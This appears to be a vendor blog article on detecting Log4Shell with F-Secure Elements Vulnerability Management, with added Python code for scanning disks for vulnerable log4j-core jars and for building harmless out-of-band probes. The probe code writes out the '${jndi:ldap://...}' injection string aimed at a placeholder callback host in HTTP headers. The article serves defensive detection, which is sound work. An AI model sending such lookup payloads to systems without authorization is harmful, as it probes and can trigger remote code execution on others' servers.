What is the Log4Shell vulnerability and how do you identify it?

Recently the vulnerability known as Log4Shell (sometimes, confusingly, called LogJam, a name that properly belongs to an unrelated 2015 TLS weakness) made many headlines soon after Apache disclosed it on Friday, December 10, 2021. We already explained in our previous articles how attackers are trying to exploit Log4Shell and why companies using Log4j 2 should not just patch, but also begin incident response.

Patching all vulnerable systems would be easy if you knew every system that requires patching, but Log4j is a library bundled into many applications rather than a product that shows up in an inventory, and manually verifying each system for Log4j and its version takes too long. This article gives guidance on how to identify Log4j vulnerabilities with F-Secure Elements Vulnerability Management. The solution lets you continuously discover and scan assets in the network, and identify, categorize, report and prioritize fixing vulnerabilities in systems, software and applications.

F-Secure added the Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046) to its vulnerability definitions database on December 15, 2021, so you can use F-Secure Elements Vulnerability Management to scan for and identify vulnerable Log4j systems. Complete vulnerability coverage can be checked in the news section, which lists all newly added vulnerability definitions.

Three easy methods to identify vulnerable Log4J

F-Secure Elements Vulnerability Management gives you visibility into potential Log4j vulnerabilities in three complementary ways: scan systems for vulnerable software versions, scan file systems for vulnerable Log4j libraries, or test exposed services with a harmless exploit. The methods find different things, so use more than one: a version check only catches applications whose vulnerable versions are in the definitions database, a library scan needs credentials on the host, and an exploit test only sees services it can reach from the network.


Method 1: Detect vulnerable applications and version numbers

Use F-Secure Elements Vulnerability Management to scan systems for vulnerable software versions. Installed applications and version numbers known to be vulnerable can be detected in two ways: by running a system scan with the authenticated system scanning method, or, across all managed endpoints regardless of network location, by running a vulnerability scan with the multi-functional F-Secure Elements Agent on the endpoints, the same agent that delivers endpoint protection and EDR capabilities. In the example below, VMware vCenter Server is flagged for a remote code execution vulnerability that it inherited from its bundled Log4j.

[Screenshot: Three easy methods to identify vulnerable Log4J: method 1]

Method 2: Scan systems for vulnerable Log4J libraries

Authenticated system scans can be used to identify vulnerable Log4j libraries on both Windows and Linux systems. The system scan crawls the local hard disks and reports back any vulnerable Log4j libraries it finds, which catches copies bundled inside applications that a version check would never attribute to Log4j. The example below found vulnerable Apache Log4j libraries on a Linux system, making it easy to prioritize upgrade actions across vulnerable systems.

[Screenshot: Three easy methods to identify vulnerable Log4J: method 2]
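To make concrete what an on-disk library check has to handle, here is an added Python example. It is not F-Secure's code and not a description of how Elements implements its scan; it shows the logic any such crawl needs. It walks a directory tree, looks inside every archive, recurses into nested archives (log4j-core is often shaded into a fat JAR or packaged inside a WAR), reads the version from the pom.properties that log4j-core ships, applies Apache's fixed-version list for CVE-2021-44228 and CVE-2021-45046, and checks whether JndiLookup.class is still present, since removing that class was the documented mitigation for unpatched versions. The fixture archives, file names and versions are constructed in a temporary directory purely for illustration.

```python
"""Inventory log4j-core copies on disk and flag CVE-2021-44228 / CVE-2021-45046.
Added example, not F-Secure Elements code; it shows the logic a file-system crawl
like Method 2 needs. All sample archives are constructed fixtures, not real software."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = {".jar", ".war", ".ear", ".zip"}
_VER = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(-(?:beta|rc)\d+)?$")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0) (pre-release sorts first)."""
    m = _VER.match(text.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def classify(version, jndi_present):
    """Which of the two CVEs this article covers a log4j-core of this version has.
    Apache fixed CVE-2021-44228 in 2.15.0 and CVE-2021-45046 in 2.16.0; the Java 7
    and Java 6 branches got both fixes in 2.12.2 and 2.3.1. Removing JndiLookup.class
    is the documented mitigation, so a jar without it is not flagged."""
    v = parse_version(version)
    if v is None or v[0] != 2 or not jndi_present:
        return []  # unparsable, log4j 1.x, or mitigated by class removal
    if (v[1] == 12 and v[2] >= 2) or (v[1] == 3 and v[2] >= 1):
        return []  # backport branches 2.12.2+ and 2.3.1+
    if v < (2, 15, 0, 1):
        return ["CVE-2021-44228", "CVE-2021-45046"]
    if v < (2, 16, 0, 1):
        return ["CVE-2021-45046"]
    return []  # 2.16.0 and later; CVEs fixed in 2.17.x are outside this check


def _scan_archive(data, label, findings):
    """Inspect one archive held in memory, recursing into archives nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM in names:
            m = re.search(r"^version=(.+)$", zf.read(POM).decode("utf-8", "replace"), re.M)
            version = m.group(1).strip() if m else "unknown"
            findings.append({"path": label, "version": version,
                             "cves": classify(version, JNDI_CLASS in names)})
        for name in names:
            if Path(name).suffix.lower() in ARCHIVE_EXT:
                _scan_archive(zf.read(name), label + "!/" + name, findings)


def scan_tree(root):
    """Walk root and return one finding per log4j-core found, nested or not."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_EXT:
            _scan_archive(p.read_bytes(), str(p), findings)
    return findings


def _fake_log4j_core(version, with_jndi=True):
    """Constructed fixture: a jar carrying only the markers the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, "version=%s\nartifactId=log4j-core\n" % version)
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed fixtures: 2.14.1, 2.15.0, 2.14.1 with JndiLookup removed, and a
    WAR shading 2.14.1 under WEB-INF/lib. File names are hypothetical."""
    lib = Path(root, "app", "lib")
    lib.mkdir(parents=True)
    (lib / "log4j-core-2.14.1.jar").write_bytes(_fake_log4j_core("2.14.1"))
    (lib / "log4j-core-2.15.0.jar").write_bytes(_fake_log4j_core("2.15.0"))
    (lib / "log4j-core-2.14.1-nojndi.jar").write_bytes(_fake_log4j_core("2.14.1", False))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
    Path(root, "app", "service.war").write_bytes(war.getvalue())


def demo():
    """Build the fixtures in a temp dir, scan them, return {path relative to root: cves}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {f["path"][len(root) + 1:].replace("\\", "/"): f["cves"]
                for f in scan_tree(root)}


if __name__ == "__main__":
    for path, cves in sorted(demo().items()):
        print(path, "->", ", ".join(cves) or "not exposed to CVE-2021-44228/45046")
```

A crawl of this kind is only as good as its archive handling: a scanner that does not open nested archives, or that trusts the file name instead of the embedded pom.properties, misses renamed and shaded copies. The classification above covers only the two CVEs this article discusses; later Log4j releases addressed further issues, so "not exposed" here means not exposed to these two.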

Method 3: Test services against Log4J exploitation

Another way to detect this vulnerability with F-Secure Elements Vulnerability Management is a harmless exploit test. It uses unauthenticated system scans against web services on common web ports (e.g. 80, 443, 8080, 8081 or 8085) and checks whether each service is vulnerable: the scanner injects a harmless jndi:ldap lookup expression into HTTP request fields, listens for the out-of-band lookup that a vulnerable Log4j performs when it logs that field, and reports the results back to F-Secure Elements Vulnerability Management for easy prioritization. The result is a list of systems in your network that accepted the injected lookup, with port numbers and the remediation action to update Log4j to a fixed version. Because this test reaches only exposed services and only the request fields it injects into, a clean result from this method alone does not prove a system is free of vulnerable Log4j; combine it with methods 1 and 2.

[Screenshot: Three easy methods to identify vulnerable Log4J: method 3]
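As an added illustration of how a test of this kind is built (example code, not F-Secure's scanner and not a description of its internals), the Python below assembles one probe per target and per injected request field, giving each a unique token inside the lookup hostname so that a callback identifies not just the host and port but the exact field that fired, and then correlates listener log lines back to those targets. The callback host oob.example.net, the header list, the listener log format and the sample targets are assumptions for illustration; nothing is sent, and the log lines are constructed. Running a probe like this against systems you are not authorized to test is an attack, not a scan, even with a harmless listener.

```python
"""Harmless Log4Shell reachability probe with callback correlation.
Added example, not F-Secure Elements code; it shows the shape of the unauthenticated
test described under Method 3. CALLBACK_HOST, INJECT_HEADERS and the listener log
format are assumptions for illustration. Nothing is sent: build_probes() returns the
requests that would go out, correlate() matches constructed listener log lines."""
import re
import secrets

CALLBACK_HOST = "oob.example.net"  # assumed LDAP/DNS listener under your control
# Request fields that Java web apps commonly log; each gets its own token so a
# callback identifies the host, the port and the injection point that fired.
INJECT_HEADERS = ("User-Agent", "X-Api-Version", "Referer", "X-Forwarded-For")
_LOG = re.compile(r"query for (?P<token>[0-9a-f]{16})\." + re.escape(CALLBACK_HOST))


def build_probes(targets, token_fn=lambda: secrets.token_hex(8)):
    """targets: iterable of (host, port). Returns (requests, registry): requests is a
    list of {url, headers} to send; registry maps token -> (host, port, header)."""
    requests, registry = [], {}
    for host, port in targets:
        headers = {}
        for header in INJECT_HEADERS:
            tok = token_fn()
            registry[tok] = (host, port, header)
            # The lookup a vulnerable log4j-core tries to resolve when it logs this
            # field. Putting the token in the hostname means the listener sees it in
            # the DNS query even if the LDAP connection itself never arrives.
            headers[header] = "${jndi:ldap://%s.%s/a}" % (tok, CALLBACK_HOST)
        scheme = "https" if port == 443 else "http"
        requests.append({"url": "%s://%s:%d/" % (scheme, host, port), "headers": headers})
    return requests, registry


def correlate(listener_log_lines, registry):
    """Map listener log lines to {(host, port): set of headers that fired}. Tokens
    not in registry are ignored: noise, or probes from another scan run."""
    hits = {}
    for line in listener_log_lines:
        m = _LOG.search(line)
        if m and m.group("token") in registry:
            host, port, header = registry[m.group("token")]
            hits.setdefault((host, port), set()).add(header)
    return hits


def demo():
    """Constructed run: deterministic tokens, two targets, and a listener log in which
    one target calls back through two headers and one line carries an unknown token."""
    counter = iter(range(1, 10**6))
    reqs, registry = build_probes([("10.0.0.5", 8080), ("10.0.0.6", 443)],
                                  token_fn=lambda: "%016x" % next(counter))
    log = [  # constructed listener output, not real data
        "2021-12-15T10:02:11Z query for 0000000000000001.oob.example.net from 10.0.0.5",
        "2021-12-15T10:02:11Z query for 0000000000000003.oob.example.net from 10.0.0.5",
        "2021-12-15T10:02:12Z query for deadbeefdeadbeef.oob.example.net from 203.0.113.9",
    ]
    return reqs, correlate(log, registry)


if __name__ == "__main__":
    _, hits = demo()
    for (host, port), headers in sorted(hits.items()):
        print("%s:%d called back via %s" % (host, port, ", ".join(sorted(headers))))
```

A callback shows that the injected field reached a Log4j lookup and that the host could resolve or connect to the listener; it does not prove code execution, and its absence does not prove the system is safe, since egress filtering, a WAF or an untested request field can all hide a vulnerable instance.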

Find your Log4J vulnerabilities before anyone else does

New customers can start a 30-day free F-Secure Elements trial at f-secure.com/elements and then request Vulnerability Management functionality to be enabled for the trial, which includes Endpoint Protection and EDR by default. If you already run F-Secure Elements without vulnerability management capabilities, you can activate them by switching the subscription; the capabilities are then activated automatically on all endpoints already running the F-Secure Elements Agent.

You can also use F-Secure Elements Endpoint Protection to identify other outdated software and apply new versions, and F-Secure Elements EDR to automatically detect attacks that have bypassed the preventive measures, whether they use the Log4j vulnerability or some other method.

For a technical audience, F-Secure experts have put together a list of indicators of compromise covering scanning, exploitation and subsequent payload delivery after Log4j exploitation, in a continuously updated technical community article that also describes how F-Secure continues to add detection capabilities for Log4j. F-Secure's Incident Response team has also published a post with additional information on the vulnerability.